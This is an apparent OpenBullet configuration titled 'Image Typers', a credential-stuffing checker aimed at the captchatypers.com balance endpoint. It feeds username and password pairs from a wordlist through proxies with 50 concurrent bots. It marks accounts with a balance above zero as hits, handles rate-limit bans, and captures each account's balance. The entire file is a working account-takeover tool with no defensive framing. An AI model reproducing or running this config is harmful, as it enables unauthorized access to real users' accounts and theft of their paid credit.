[SETTINGS]
{
  "Name": "Image Typers",
  "SuggestedBots": 50,
  "LastModified": "2018-06-19T22:00:58.7380479+00:00",
  "AdditionalInfo": "",
  "Author": "Ruri",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "UserPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "http://captchatypers.com/Forms/RequestBalance.ashx" AutoRedirect=TRUE 
  CONTENT "username=<USER>&password=<PASS>&action=REQUESTBALANCE" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "AUTHENTICATION_FAILED" 
  KEYCHAIN Success AND 
    KEY "<SOURCE>" GreaterThan "0" 
  KEYCHAIN Retry OR 
    KEY "Bad Request" 
  KEYCHAIN Ban OR 
    KEY "Too Many Requests" 
#CAPTURE_BALANCE PARSE "<SOURCE>" LR "" "" Recursive=FALSE -> CAP "Balance" "" "" 
